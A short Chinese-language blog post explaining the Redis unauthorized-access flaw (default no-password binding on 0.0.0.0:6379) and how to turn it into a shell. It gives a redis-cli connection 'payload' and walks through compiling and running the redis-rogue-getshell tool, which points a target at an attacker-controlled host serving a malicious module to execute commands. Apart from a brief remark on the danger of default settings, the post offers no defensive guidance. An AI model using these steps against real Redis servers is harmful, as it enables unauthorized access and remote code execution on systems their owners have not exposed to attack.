Redis 未授权访问漏洞与getshell(附getshell检测工具)
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的未授权范围与Pickle反序列化
·
0x00 Redis简介
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的未授权范围与Pickle反序列化
0x01 未授权访问漏洞
redis的默认配置,会讲服务器放在公网,并且监听0.0.0.0:6379,也就是说会监听一切的来源流量,而且redis默认配置没有密码,如果没有防火墙等策略拦截流量等措施马,即其他用户可以通过直接默认链接的方式登录该redis,从而造成未授权范围,并且具有很高的危害
payload:redis-cli -h 192.168.222.134
后续可在redis数据库上执行相关命令,写马,shell等获取权限
0x02 redis getshell 工具使用
工具地址:https://github.com/vulhub/redis-rogue-getshell
工具使用:
1.编译RedisModulesSDK文件
2.命令执行:python3 redis-master.py -r 目标IP -p 6379 -L 主机IP -P 8888 -f RedisModulesSDK/exp.so -c "id"
补充
Redis未授权后可以进行许多的操作,写入shell,管理文件等等,默认配置危害巨大。
更多推荐
已为社区贡献6条内容
所有评论(0)